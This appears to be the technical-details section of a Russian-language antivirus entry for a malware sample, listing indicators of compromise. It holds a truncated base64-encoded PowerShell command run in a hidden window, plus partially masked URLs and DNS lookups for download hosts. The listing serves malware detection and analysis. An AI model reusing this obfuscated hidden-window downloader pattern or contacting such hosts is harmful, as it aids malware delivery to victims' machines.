Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAE0ARQBYAFkAagBsAHcAPQAnAFcASwBZAFgAUgBlAGYAcQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAGMAdQByAGkAVAB5AFAAcgBvAFQATwBjAGAATwBsACIAIAA9AC...
- http://ho###minhmz.com/cgi-bin/q0_nrb_p2qrgvqj2a/
- http://co####rcon.com.br/erros/u_mkq_6c420i08w/
- DNS ASK ho###minhmz.com
- DNS ASK ba#####ongsanonline.com
- DNS ASK le##r.xyz
- DNS ASK co####rcon.com.br
- DNS ASK di####uoclong.tk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAE0ARQBYAFkAagBsAHcAPQAnAFcASwBZAFgAUgBlAGYAcQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAGMAdQByAGkAVAB5AFAAcgBvAFQATwBjAGAATwBsACIAIAA9AC...' (со скрытым окном)